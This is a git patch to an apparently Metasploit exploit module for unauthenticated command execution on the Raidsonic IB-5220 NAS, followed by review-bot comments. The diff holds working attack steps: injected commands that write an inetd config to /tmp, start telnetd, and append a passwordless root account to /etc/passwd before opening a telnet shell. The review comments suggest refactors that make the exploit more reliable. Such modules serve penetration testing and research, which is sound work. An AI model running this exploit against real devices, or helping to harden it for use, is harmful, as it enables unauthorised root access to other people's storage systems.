From 6b872403230b6ea91fa07e97f4a2632ce30cb4db Mon Sep 17 00:00:00 2001
From: m-1-k-3
Date: Wed, 14 Aug 2013 16:51:09 +0200
Subject: [PATCH] thx to juan ... session stuff looks better
---
 .../http/raidsonic_nas_ib5220_exec_noauth.rb | 119 +++++++++---------
 1 file changed, 63 insertions(+), 56 deletions(-)
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index f8f37a24fa..5c4c24dd8c 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed 
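Review bot: The USERNAME and PASSWORD options registered in this hunk are not read by any line of the patch — the telnet login in the later hunks uses the randomly generated `user` from `rand_text_alpha(6)` with an empty password — so unless code outside these hunks consumes `datastore['USERNAME']`, they are dead options on a module whose name says `noauth` and should be dropped. The `|| 10` and `|| 25` fallbacks in `tel_timeout` and `banner_timeout` are likewise unreachable, because both OptInt options are registered as required with those same defaults; `datastore['TelnetTimeout'].to_i` is enough. Minor style: `OptString.new('USERNAME',[` lacks the space after the comma that the OptInt lines have, and the options array carries a stray blank line before its closing bracket. Note that `def exploit` starts in this hunk but its body continues past it.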
@@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end 
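Review bot: The new `if sock.nil?` guard after `Rex::Socket.create_tcp` in the third hunk on this line is almost certainly dead: as far as I recall, create_tcp raises `::Rex::ConnectionError` (or an Errno) on a failed connect rather than returning nil, so the failure actually surfaces through the bare `rescue` at the end of this `begin` block, which lies outside the hunk. Behaviour is unchanged, but the guard reads as if a nil socket were the expected failure path and will mislead the next maintainer. I would replace it with an explicit rescue around the connect, e.g. `sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })` / `rescue ::Rex::ConnectionError` / `fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")`, and drop the nil check.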
@@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote
         :active => true
       }
       report_auth_info(auth_info)
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE' => nil,
-        'PASS_FILE' => nil,
-        'USERNAME' => user,
-        'PASSWORD' => nil
-      }
+      prompt = negotiate_telnet(sock)
+      if prompt.nil?
+        sock.close
+        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+      else
+        print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+      end
+
       sock.put(user)
       sock.put("\r\n")
-      sock.put("rm /tmp/#{inetd_cfg}")
-      sock.put("\r\n")
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+      handler(sock)
     rescue
       fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
     end
@@ -206,7 +198,22 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       return res
     rescue ::Rex::ConnectionError
-      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+    end
+  end
+  def negotiate_telnet(sock)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /login/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
     end
   end
 end
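Review bot: The new `fail_with(... "Unable to establish a telnet session")` is raised inside a `begin` whose trailing bare `rescue` catches StandardError; if `Msf::Exploit::Failed` derives from StandardError, as I believe it does, that specific message is swallowed and replaced by the generic "Backdoor service has not been spawned!!!", and the same happens to any NoMethodError or Errno raised by the telnet handling, which hides the real cause from the operator. The generic path also leaves `sock` open, whereas the new prompt-failure branch closes it. I would re-raise `Msf::Exploit::Failed` ahead of the bare rescue, and in the bare rescue record the error and close the socket, as below. `prompt` only ever holds true or nil from `negotiate_telnet`, so `if negotiate_telnet(sock).nil?` without the intermediate variable would read more honestly.
```ruby
    # … unchanged: report_auth_info, negotiate_telnet check, sock.put(user), handler(sock) …
    rescue Msf::Exploit::Failed
      raise
    rescue => e
      sock.close if sock
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!! (#{e.class}: #{e.message})")
    end
```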
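Review bot: `negotiate_telnet` tests `data =~ /login/` against each chunk returned by `get_once` in isolation, so a banner whose prompt straddles two reads (for example "log" arriving in one chunk and "in:" in the next) is never recognised and the method falls through to the banner timeout; accumulating the reads into a buffer and matching against that fixes it. Style: `while(true)` should be `loop do`, `return nil if not data or data.length == 0` should be `return nil if data.nil? || data.empty?`, the explicit `begin`/`rescue`/`end` can be the method-level `rescue`, and the method should carry a short comment stating that it returns true once a login prompt is seen and nil on EOF or timeout. There is also no blank line between the preceding `end` and `def negotiate_telnet`.
```ruby
  # Reads from the freshly spawned telnet service until a login prompt
  # appears. Returns true on a prompt, nil on EOF or when no prompt
  # arrives within banner_timeout seconds.
  def negotiate_telnet(sock)
    banner = ''
    Timeout.timeout(banner_timeout) do
      loop do
        data = sock.get_once(-1, tel_timeout)
        return nil if data.nil? || data.empty?
        banner << data
        return true if banner =~ /login/
      end
    end
  rescue ::Timeout::Error
    nil
  end
```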